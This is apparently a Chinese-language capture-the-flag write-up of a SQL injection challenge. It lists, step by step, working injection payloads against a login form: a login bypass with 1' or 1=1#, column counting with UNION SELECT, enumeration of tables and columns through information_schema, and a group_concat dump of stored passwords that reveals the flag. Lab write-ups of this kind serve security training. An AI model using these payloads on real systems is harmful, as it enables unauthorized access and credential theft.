显然是一道SQL注入题
在用户名和密码处输入引号测试,可以发现是单引号闭合。
输入以下进行测试
q';test
123
回显
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘test’ and password=‘123’’ at line 1
此时很容易想到输入
a
1' or 1=1#
回显
Hello admin!
Your password is ‘cf216d7205a8127885dc04d668789e7e’
32位字符串?拿去MD5解密,然而失败
好在注入点已经很明确了,继续测试
a
1'or 1=1 union select 1;#
回显
The used SELECT statements have a different number of columns
直到
a
1'or 1=1 union select 1,2,3;#
回显
Hello admin!
Your password is ‘cf216d7205a8127885dc04d668789e7e’
可以知道是三个字段,接下来看看是哪些字段返回前端
a
1'or 1=1 union select 1,2,3 limit 1,1;#
回显
Hello 2!
Your password is ‘3’
那么就是第二和第三个字段返回前端
接下来就方便查询了
a
1'or 1=1 union select 1,database(),3 limit 1,1;#
回显
Hello geek!
Your password is ‘3’
当前数据库名:geek,那么接下来查表
a
1'or 1=1 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 1,1;#
回显
Hello 2!
Your password is ‘geekuser’
继续
Hello 2!
Your password is ‘l0ve1ysq1’
回显
NO,Wrong username password!!!
那么表就应该是geekuser和l0ve1ysq1了
猜一手flag在l0ve1ysq1里
a
1'or 1=1 union select 1,2,column_name from information_schema.columns where table_name='l0ve1ysq1' limit 1,1;#
回显
Hello 2!
Your password is ‘id’
继续
Hello 2!
Your password is ‘username’
Hello 2!
Your password is ‘password’
得到三个列名
a
1'or 1=1 union select 1,2,password from geek.l0ve1ysq1 limit 1,1;#
回显
Hello 2!
Your password is ‘wo_tai_nan_le’
继续
Hello 2!
Your password is ‘glzjin_wants_a_girlfriend’
Hello 2!
Your password is ‘biao_ge_dddd_hm’
Hello 2!
Your password is ‘linux_chuang_shi_ren’
麻了,这都什么
那就用group_concat
a
1'or 1=1 union select 1,2,group_concat(password) from geek.l0ve1ysq1 limit 1,1;#
回显
Hello 2!
Your password is 'wo_tai_nan_le,glzjin_wants_a_girlfriend,biao_ge_dddd_hm,linux_chuang_shi_ren,a_rua_rain,yan_shi_fu_de_mao_bo_he,cl4y,di_2_kuai_fu_ji,di_3_kuai_fu_ji,di_4_kuai_fu_ji,di_5_kuai_fu_ji,di_6_kuai_fu_ji,di_7_kuai_fu_ji,di_8_kuai_fu_ji,Syc_san_da_hacker,flag{1357753e-60f6-484b-9cbe-11b18875a87a}
大功告成